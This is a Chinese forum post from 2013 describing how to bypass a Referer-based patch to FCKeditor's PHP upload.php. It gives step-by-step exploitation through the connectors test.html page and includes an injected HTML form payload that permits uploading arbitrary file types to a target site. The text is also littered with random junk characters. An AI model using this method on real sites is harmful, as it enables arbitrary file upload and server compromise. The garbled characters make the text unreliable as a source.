漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php( B b2 s* `1 ~, j, a
网上给出的修复方案是& G, K }$ ]9 k& R
修复方法,删除FCK编辑器用其他的编辑器
b+ a/ Z0 Z3 Y! {或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件3 z. v3 d Q2 {1 H6 ~7 v
在3 x8 F' }0 U; x% G) u/ i
require(‘config.php’);
& R+ I" H( z- x: K d# P7 U" orequire(‘util.php’);
1 S* }* R- d3 F/ K. h1 x/ j的下面添加以下代码—————————–
- ]' G# U+ R! f; D% Y" R% N//防止外部提交
+ ]3 J1 y% ~* [function outsidepost()
& y' R; `' [- i( _{; N- P7 o' A% T7 @5 Y
$servername=$_SERVER['SERVER_NAME'];5 V( j: K. B: F6 a. j
$sub_from=@$_SERVER['HTTP_REFERER'];
4 c0 w/ G& W* X% x- g4 }) D$sub_len=strlen($servername);
1 Z; t0 ]6 g, q. U* b; F: T$checkfrom=substr($sub_from,7,$sub_len);
* r% I+ K5 ]# G7 U) nif($checkfrom!=$servername){
3 C! G4 L! P6 recho(“you don’t outsidepost!”);
/ k+ X, W) g3 |# V8 _exit;9 ~+ d: E4 u. G0 W6 j ]( G
}) U: A$ q0 E: ^3 T1 T
}! o# S H; e* a2 ?, Z; A# } k% x' A
outsidepost();
# y) y$ ~' t, k* g- d防止外部提交,但是没有防止内部提交,6 L; y' E) }0 ]" }; b- X* \
利用方法:- Q- b* H6 r' [& a. w
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html: Z2 o$ I' C2 G: Y0 A
2,在Current Folder 框输入& d, R0 l! J3 i. L
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>) p. n2 D+ Q) |1 {" [ Y% x1 X1 T$ k
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。7 _0 E6 V6 h( E
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对